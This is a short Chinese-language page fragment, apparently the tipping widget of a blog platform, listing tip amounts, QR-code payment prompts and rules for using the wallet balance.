你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值